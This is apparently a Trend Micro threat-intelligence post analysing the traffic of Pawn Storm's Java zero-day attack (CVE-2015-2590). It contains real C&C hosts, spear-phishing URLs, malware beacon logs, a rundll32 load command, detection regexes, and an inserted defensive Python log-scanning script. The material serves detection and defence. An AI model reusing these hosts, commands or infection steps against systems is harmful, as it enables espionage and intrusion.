## An In-Depth Look at How Pawn Storm’s Java Zero-Day Was Used

Posted on: July 14, 2015 at 9:29 pm. Posted in: [Exploits](http://blog.trendmicro.com/trendlabs-security-intelligence/category/exploits/), [Malware](http://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/), [Targeted Attacks](http://blog.trendmicro.com/trendlabs-security-intelligence/category/targeted_attacks/). Author: Trend Micro

Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor personnel from the United States and its allies. The attackers behind Operation Pawn Storm have been active since at least 2007 and they continue to launch new campaigns. Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, [such as the use of an iOS espionage app, and the inclusion of new targets like the White House](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/).

Through our on-going investigation and monitoring of this targeted attack campaign, we found suspicious URLs that hosted a newly discovered zero-day exploit in Java, now identified by Oracle as [CVE-2015-2590](https://blogs.oracle.com/security/entry/july_2015_critical_patch_update). This is the first time in nearly two years that a new Java zero-day vulnerability was reported.

_The report below outlines the traffic observed as part of the attack, not the exploit itself. Our blog entry on how the exploit itself works can be found [here](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-trend-micro-discovers-new-java-zero-day-exploit/). This blog entry is intended to help readers identify traffic in their network that would indicate if such an exposure had occurred. We strongly recommend that all readers [roll out the Oracle patch as soon as possible](https://blogs.oracle.com/security/entry/july_2015_critical_patch_update)._

**_Infection sequence_**

Trend Micro has observed that an entity belonging to the target profile received an email that contains the following URL:

`hxxp://ausameetings[.]com/url?={BLOCKED}/2015annualmeeting/`

It is worth noting that the spearphishing domain used is ausameetings[.]com, a play on the valid domain “ausameetings.org,” which is the site for AUSA’s (Association of the United States Army) annual exposition, commonly held in mid-October. The domain was only registered last July 8, which implies a one-time use for a specific set of targets.

When assessing this URL, it was determined that the most probable infection sequence is:

_Figure 1. Infection chain_

Like all multi-stage infections, a successful execution of the previous stage is required before moving to the next stage down. In Stage 1, the sequence is initiated by clicking on the URL embedded within the victim’s spearphishing email. Once the Java exploit of Stage 1 is successful, it downloads the PE file (Stage 2). Once the PE file is downloaded and executed, it drops and runs the DLL file (Stage 3), which is the final component to infect the machine with SEDNIT.

The information that we have on each of these steps is as follows.

|Stage|Type|SHA1|File Name|File Size|Trend Micro Detection|
|---|---|---|---|---|---|
|Stage 1|Java Exploit|95dc765700f5af406883d07f165011d2ff8dd0fb|Spearphishing URL matching `hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/`||JAVA_DLOADR.EFD|
|Stage 2|PE|b4a515ef9de037f18d96b9b0e48271180f5725b7|Drops as cormac.mcr; end resulting file on host system as vhgg5hkvn25.exe|1,619,968 bytes|TROJ_DROPPR.CXC|
|Stage 3|DLL|21835aafe6d46840bb697e8b0d4aac06dec44f5b|api-ms-win-downlevel-profile-l1-1-0.dll|40,960 bytes|[TSPY_SEDNIT.C](http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TSPY_SEDNIT.C)|

**_Stage 1 – the Java exploit_**

The first stage of the infection sequence comes through a targeted, spearphishing attempt against the victim, which is [the observed method for Operation Pawn Storm attacks](http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf).

The initial spearphishing URL is constructed similar to:

`hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/`

The web pages on this domain that were found to drop the Java zero-day exploit include:

- 1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ
- 3_544306 index.htm (4,077 bytes) – detected as HTML_JNLPER.HAQ

The network traffic observed for the infection sequence of this stage is:

1. Send the initial POST as per the spearphishing email to ausameetings[.]com, which includes the _2015annualmeeting_ URI path.
2. Send an encoded POST call, which, when decoded, is the variable used to construct the subsequently used URI path. This is particularly interesting, as it appears that each URI path on the malicious server is customized per victim infection rather than being static on the web server.
3. The victim machine then does a variety of GET calls to pull down JPG, JNLP, and Java class files.
4. If the Java class files cannot be found on the primary domain (ausameetings[.]com), it appears to instead attempt to get these files from a hardcoded IP (87[.]236[.]215[.]132).
5. Once the class files are downloaded, the victim machine then does a GET call to fetch the file _cormac.mcr_. This file is the PE file for Stage 2.

For completeness, the specific traffic calls observed relating to Stage 1 include the following:

|Result|Protocol|Host|URL|Size|Content-Type|
|---|---|---|---|---|---|
|200|HTTP|ausameetings[.]com|/url?={BLOCKED}/2015annualmeeting/|19,225|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/VFlmsRH/7311/4388/558923/?p2=KlW2HlMf&c=BMjNiBV&recr=Wr1mI7&p3=364397021&as=SAUmj&c=GY9oCdQ&|22|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/url/544036/|4,077|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/url/544036/line.jpg|22,500|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/url/544036/right.jpg|97,247|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/url/544036/init.jnlp|562|application/x-java-jnlp-file|
|200|HTTP|ausameetings[.]com|/url/544036/|4,077|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/url/544036/jndi.properties|125|text/html; charset=utf-8|
|404|HTTP|ausameetings[.]com|/url/544036/Go.class|0|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/Go.class|1,373|text/html; charset=utf-8|
|404|HTTP|87[.]236[.]215[.]132|/crossdomain.xml|0|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/App.class|7,552|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/Help.class|5,667|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/PhantomSuper.class|763|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/ArrayReplace.class|729|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/App$PassHandleController.class|980|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/Converter.class|2,820|text/html; charset=utf-8|
|200|HTTP|87[.]236[.]215[.]132|/2/MyByteArrayInputStream.class|1,282|text/html; charset=utf-8|
|404|HTTP|87[.]236[.]215[.]132|/2/pkg/None2.class|0|text/html; charset=utf-8|
|404|HTTP|87[.]236[.]215[.]132|/2/pkg/None.class|0|text/html; charset=utf-8|
|200|HTTP|ausameetings[.]com|/url/544036/cormac.mcr|1,619,968|application/octet-stream|

Trend Micro detects these Java class files as JAVA_DLOADR.EFD:

- App.class (7,552 bytes)
- Go.class (1,373 bytes)
- Help.class (5,667 bytes)

The second and third traffic calls in the traffic pattern are particularly interesting to note.

_Figure 2. Traffic patterns (click the image to enlarge)_

One can observe that the second call sends a POST to ausameetings[.]com and is returned with a text response that is then used as the URI path for the subsequent HTTP requests.

**_Stage 2 – The PE file_**

Stage 2 involves downloading a PE file. Trend Micro detects this file as TROJ_DROPPR.CXC. The primary purpose of this PE is to drop and load the DLL executable. It is downloaded as Cormac.mcr, but once extracted, the file name is converted into a randomized file name. It is installed into

_Figure 3. Observed processes (click the image to enlarge)_

Once the malware is executed, it will drop the Stage 3 DLL file with the filename _api-ms-win-downlevel-profile-l1-1-0.dll_ in the %TEMP% directory. To load the malware, it executes rundll32.exe using the following command:

`rundll32.exe “%temp%/api-ms-win-downlevel-profile-l1-1-0.dll”,init`

**_Stage 3 – The DLL file_**

This third stage involves a DLL file, which we detect as TSPY_SEDNIT.C. When the PE file triggers the DLL (in this instance the process is `%windir%\system32\RunDll32.exe` with the command line `“%windir%\system32\RunDll32.exe ” “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\api-ms-win-downlevel-profile-l1-1-0.dll”,init`), the following traffic was observed. All five requests carry `Content-Type: application/x-www-form-urlencoded`.

|#|Request|Host|Content-Length|Note|
|---|---|---|---|---|
|1|`POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1`|www.google.com|0|Assumed to be a local connectivity test traffic call.|
|2|`POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1`|192[.]111[.]146[.]185|830||
|3|`POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1`|www.google.com|0|Assumed to be a local connectivity test traffic call.|
|4|`POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1`|192[.]111[.]146[.]185|0||
|5|`POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1`|192[.]111[.]146[.]185|26||

It bears stressing that we do not encourage using the data presented above as IOCs for your own analysis. The network traffic generated by this stage was a challenge to assess, as it appears to have polymorphic capabilities in the creation of the URI paths used to pull down files. After assessing the samples multiple times, each network traffic infection sequence appeared to be different, no matter what sequence of testing was performed (e.g., same machine, different machines, different geographic IP space globally, etc.).

After detailed network forensics of the traffic, it was determined that no single stable URL path or URI query component (URI path component, file name, or URI query parameter) showed a consistent pattern (neither the same entry nor a regex-definable pattern), and further reverse engineering was required to determine the methods used to achieve this.

As a result of this additional analysis, it was determined that the URI path is a randomly generated string with the following pattern:

`^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=`

_Figure 4. Regex expression_

Included in the POST request is data encoded with Base64 and XOR encryption. The encoded data contains the following system information of the infected machine:

- OS Version
- List of running processes
- Hard Disk Drive Information
- Volume Serial Number

TSPY_SEDNIT.C connects to three C&C servers:

- 192[.]111[.]146[.]185 (direct to IP call)
- www[.]acledit[.]com
- www[.]biocpl[.]org

After sending the encrypted data, it will wait for a reply which is encrypted by the same algorithm above.

**_Phase 2 of the attack: the keystroke logger_**

Based on our investigation of Operation Pawn Storm, we know that the infection happens in two phases:

- In phase 1, opening the email attachment or clicking on the malicious URI initiates the download of the first level dropper, which installs the downloader component (.DLL file).
- In phase 2, the downloader component communicates with a C&C server and downloads other components, and at the end of the chain a keylogger is installed. The keylogger sends data back to the C&C server.

As of writing, we have not succeeded in triggering Phase 2, which will download a fourth stage malware from the C&C servers. This fourth stage malware is expected to be an encrypted executable file.

**_Victims of the Attack_**

A number of victims were identified during the course of our investigation. The targets are in the United States or Canada, and those we were able to identify via IP are big defense contractors, as is typical for Operation Pawn Storm.

**_Countermeasures_**

Trend Micro is already able to protect users against this threat without any necessary updates. The existing Sandbox with Script Analyzer engine, which is part of [Trend Micro™ Deep Discovery](http://www.trendmicro.com/us/enterprise/security-risk-management/deep-discovery/), can be used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint Security in [Trend Micro™ Smart Protection Suite](http://www.trendmicro.com/us/business/complete-user-protection/) detects the exploit once the user accesses the URL that hosted it. Our Browser Exploit Prevention protects user systems against exploits targeting browsers or related plugins.

[Vulnerability protection in Trend Micro Deep Security](http://www.trendmicro.com/us/business/cloud-data/index.html) protects user systems from threats that may leverage this vulnerability with the following DPI rule:

- 1006857 – Oracle Java SE Remote Code Execution Vulnerability

Oracle has also provided [a security patch for the related vulnerability](http://blog.trendmicro.com/trendlabs-security-intelligence/oracle-patches-java-zero-day-used-in-operation-pawn-storm/).

**_Indicators of Compromise_**

The following table summarizes the identified stable IOCs that can be used to search for this attack. The “Precision” column indicates how close to the direct parameter the indicator is, inversely indicating the likelihood of collateral false positives.

|Stage|Type|Indicator|Precision|
|---|---|---|---|
|Infection Sequence – Stage 1|Domain|ausameetings[.]com|High|
|Infection Sequence – Stage 1|Domain_IP|95[.]215[.]45[.]189|Low|
|Infection Sequence – Stage 1|IP|87[.]236[.]215[.]132|High|
|Infection Sequence – Stage 1|URIPath_FileName|ArrayReplace.class|Medium|
|Infection Sequence – Stage 1|URIPath_FileName|App$PassHandleController.class|Medium|
|Infection Sequence – Stage 1|URIPath_FileName|Converter.class|Medium|
|Infection Sequence – Stage 1|URIPath_FileName|MyByteArrayInputStream.class|Medium|
|Infection Sequence – Stage 1|URIPath_FileName|None2.class|Medium|
|Infection Sequence – Stage 1|URIPath_FileName|None.class|Medium|
|Infection Sequence – Stage 1->2|URIPath_FileName|cormac.mcr|High|
|Infection Sequence – Stage 3||192[.]111[.]146[.]185|High|
|Infection Sequence – Stage 3|IP_DirectCall|37[.]187[.]116[.]240|High|
|Infection Sequence – Stage 3|Domain|www[.]acledit[.]com|High|
|Infection Sequence – Stage 3|Domain|www[.]biocpl[.]org|High|

Other posts related to Operation Pawn Storm can be found here:

- [Pawn Storm Update: Trend Micro Discovers New Java Zero-Day Exploit](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-trend-micro-discovers-new-java-zero-day-exploit/)
- [Pawn Storm Espionage Attacks Use Decoys, Deliver SEDNIT](http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/pawn-storm-espionage-attacks-use-decoys-deliver-sednit)
- [Operation Pawn Storm: Putting Outlook Web Access Users at Risk](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-putting-outlook-web-access-users-at-risk/)
- [Pawn Storm Update: iOS Espionage App Found](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/)
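To turn the Stage 1 URL pattern, the Stage 3 URI regex (Figure 4) and the IOC table above into a single triage pass over proxy logs, here is an added Python example; it is not Trend Micro's code. The log format, the client addresses and the benign requests are constructed, the hosts, file names and request paths come from the post, and the "Low" rating for a pattern-only match is this example's own judgement, not the post's.

```python
"""Proxy-log triage for the Pawn Storm / CVE-2015-2590 traffic described in
this post.  Added example, not Trend Micro code: the log format and sample
lines are constructed; hosts, file names and paths come from the post."""
import re
from typing import List, Optional, Tuple

# Stage 1: exploit host and the hard-coded fallback IP for the class files.
STAGE1_HOSTS = {"ausameetings.com", "87.236.215.132"}
# Stage 3: SEDNIT C&C servers (IP_DirectCall and Domain rows of the IOC table).
STAGE3_HOSTS = {"192.111.146.185", "37.187.116.240",
                "www.acledit.com", "www.biocpl.org"}
# Stage 1 class files the IOC table rates "Medium" (URIPath_FileName rows).
STAGE1_CLASS_FILES = {"ArrayReplace.class", "App$PassHandleController.class",
                      "Converter.class", "MyByteArrayInputStream.class",
                      "None2.class", "None.class"}
# Spear-phishing URL.  The post writes it loosely as
# /url?=[a-zA-Z0-9]{7}/2015annualmeeting/ ; as a real regex the '?' must be
# escaped, otherwise it makes the 'l' of '/url' optional instead of matching
# the literal '?' that starts the query string.
SPEARPHISH_RE = re.compile(r"^/url\?=[a-zA-Z0-9]{7}/2015annualmeeting/$")
# Stage 3 beacon URI shape, exactly as given in the post (Figure 4).
BEACON_RE = re.compile(
    r"^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=")

Hit = Tuple[str, str, str]  # (stage, reason, precision)


def classify(method: str, host: str, path: str) -> Optional[Hit]:
    """Map one request onto the post's IOC table; None means no indicator."""
    if host in STAGE3_HOSTS:
        return ("Stage 3", f"SEDNIT C&C host {host}", "High")
    if host in STAGE1_HOSTS:
        name = path.split("?", 1)[0].rsplit("/", 1)[-1]  # last path segment
        if SPEARPHISH_RE.match(path):
            return ("Stage 1", "spear-phishing URL", "High")
        if name == "cormac.mcr":
            return ("Stage 1->2", "PE dropper download cormac.mcr", "High")
        if name in STAGE1_CLASS_FILES:
            return ("Stage 1", f"exploit class file {name}", "Medium")
        return ("Stage 1", f"contact with infection host {host}", "High")
    # Unknown host: fall back to the beacon URI shape alone.  The post saw this
    # shape both towards the C&C and towards www.google.com (connectivity
    # test), and it also fits many ordinary paths, so on its own it is only a
    # weak lead.  "Low" is this example's rating, not the post's.
    if method == "POST" and BEACON_RE.match(path):
        return ("Stage 3", "URI matches SEDNIT beacon pattern", "Low")
    return None


def scan(lines: List[str]) -> List[Tuple[str, Hit]]:
    """Walk constructed proxy lines 'ts client method host path status' and
    return (client, hit) for every request that maps onto an indicator."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 6:
            continue  # malformed line: skip rather than abort the sweep
        _ts, client, method, host, path, _status = parts[:6]
        hit = classify(method, host.lower(), path)
        if hit:
            hits.append((client, hit))
    return hits


# Constructed sample log: one client replaying the chain from the post, plus
# two requests to a benign host.  Request paths are those observed in the post.
SAMPLE_LOG = [
    "2015-07-14T20:01:00Z 10.1.2.3 GET ausameetings.com /url?=aB3dE9f/2015annualmeeting/ 200",
    "2015-07-14T20:01:05Z 10.1.2.3 GET ausameetings.com /url/544036/init.jnlp 200",
    "2015-07-14T20:01:06Z 10.1.2.3 GET 87.236.215.132 /2/Converter.class 200",
    "2015-07-14T20:01:09Z 10.1.2.3 GET ausameetings.com /url/544036/cormac.mcr 200",
    "2015-07-14T20:01:20Z 10.1.2.3 POST www.google.com /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= 200",
    "2015-07-14T20:01:21Z 10.1.2.3 POST 192.111.146.185 /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= 200",
    "2015-07-14T20:02:00Z 10.1.2.4 GET www.example.com /index.html 200",
    "2015-07-14T20:02:01Z 10.1.2.4 POST www.example.com /api/v2/report.pdf/?id=42 200",
]

if __name__ == "__main__":
    for client, (stage, reason, precision) in scan(SAMPLE_LOG):
        print(f"{client}  {stage:<10} {precision:<6} {reason}")
```

The last sample line is an ordinary-looking path that still satisfies the Figure 4 regex, which is why a pattern-only hit is reported at low precision and the host and file-name indicators carry the weight.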
- [Operation Pawn Storm Ramps Up its Activities; Targets NATO, White House](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-ramps-up-its-activities-targets-nato-white-house/)
- [Pawn Storm: First Java Zero-Day Attack in Two Years Targets NATO & US Defense Organizations](http://blog.trendmicro.com/pawn-storm-first-java-zero-day-attack-in-two-years-targets-nato-us-defense-organizations/)

_Updated on July 15, 2015, 9:57AM PDT (UTC-7) to include revised detection name for DLL file and clarifications to the infection flow._

_Updated on July 15, 2015, 1:15PM PDT (UTC-7) to include more details about the infection flow._

_Updated on July 16, 2015 1:36PM PDT (UTC-7) to include screenshots of running processes._

Tags: [APT28](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/apt28/), [CVE-2015-2590](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/cve-2015-2590/), java zero-